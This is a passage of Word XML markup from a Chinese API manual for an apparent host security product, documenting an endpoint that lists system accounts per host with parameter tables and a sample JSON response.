    <w:p w14:paraId="3826A131" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>使用方法如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D02AC05" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>直接查询当前信息则直接调用系统账号信息查询结果接口（即1号接口）；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A8DFFC7"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249A4578" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>接口的调用方法、参数和返回信息等具体如下所示。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D67CDB5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="25" w:name="系统账号信息查询结果"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>系统账号信息查询结果</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="224B6CAD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>该接口用于查询系统账号信息，按每台主机每个账号进行展示。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4294ED1C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="665910DA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>GET /external/api/assets/account/{linux|win}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01E8788E"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548"/>
        <w:gridCol w:w="1329"/>
        <w:gridCol w:w="598"/>
        <w:gridCol w:w="6607"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="20CC286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E658EA4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="291E061E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7FDD83E3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7019973E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="397DBA34" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="53379DA9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>agentId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="17A841DA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2CF2F96D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="00578B0A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>唯一标识Agent的ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="14EEC9C2" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="275D1FE1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>groups</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3A9CCB70" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2C355337" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="14C6426B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>业务组ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="5537D22B" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="27BEC483" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>hostname</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5C858F6F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0ADC77DC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="46EEE0EE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机名（模糊查询）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="166D9CEF" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="59868EF1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>ip</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1A268CCB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="53F40809" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="53E51543" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机IP（模糊查询）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6872E1EE" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="062A3E64" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1DA83355" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="58C615C6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="423E3B39" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>帐号状态 linux 账号状态，1:启用，0:禁用 ；windows 账号状态，0:启用，2:禁用</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="04DECBBB" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1A525AB4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="646E6CCD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7B50E443" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6951DED7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>账号名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="7ED9613B" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="723A6E71" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>home</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="46ABD704" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="496498EF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="334BD28E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>home目录（模糊查询）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="2729F3F0" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="747417DB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>lastLoginTime</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="24C41D7A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>DateRange</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="12ABA0F9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5D4B2727" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>最后一次登录时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="2103013B" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0F7FFFD4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>gid</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3C861FFD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0085FAB1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2EEEFA3F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>用户组id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="25995DAE" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0B52F836" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>uid</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0908DB31" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="33CD9F09" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="725AEF40" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>用户id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="07AB9BFB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D8B8F66" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>/external/api/assets/account/linux?agentId=70db8ef89e9ae79a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E092421" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FBBEB4A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    "total":1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "rows":[</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "agentId":"70db8ef89e9ae79a",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "displayIp":"172.16.2.231",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "connectionIp":"172.16.2.231",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "externalIp":null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "internalIp":"172.16.2.231",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "bizGroupId":39,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "bizGroup":"qingteng",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "remark":null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "hostTagList":[</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "test-test000",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "tmp"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "hostname":"qingteng",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "uid":116,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "gid":65534,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "groups":[</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "nogroup"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "name":"kernoops",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "home":"/",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "shell":"/bin/false",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">　　　　"root": false,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "status":0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "lastLoginTime":"1970-01-01 08:00:00",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "pwdMaxDays":99999,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "pwdMinDays":-1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "pwdWarnDays":7,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "loginStatus":0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "sshAcl":"",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">　　　　"sudoAccesses": [],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "comment":"Kernel Oops Tracking Daemon,,,",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "lastLoginTty":"",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "lastLoginIp":"",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "expireTime":"1969-12-31 08:00:00",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "expired":false,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "fullName":null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "description":null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "lastChangPwdTime": "2017-09-04 08:00:00",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "accountLoginType": 3,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "interactiveLoginType": 2,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "passwordInactiveDays": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "sudo": true,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "authorizedKeys": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "encryptType": "ssh-dss",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                    "comment": "root@centos-master",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "value": "AAAAB3Nz...+fgkXA==",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "md5": "36e4313ab5b1aae15ff0f1948a4d73ea"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            ]</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    ]</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="773E65E6"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2355"/>
        <w:gridCol w:w="1081"/>
        <w:gridCol w:w="3232"/>
        <w:gridCol w:w="3414"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="6A2B9BF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FD8179A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="100E29EB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0A6ACDFA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3E6CACBD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="03CF4E22" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="260BFDC5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>agentId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="351345A2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3F63343D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(16)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5BD7E093" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>agent uuid</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="52FDD74F" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="42F522F4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>displayIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="514AB1BF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3991D4B0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
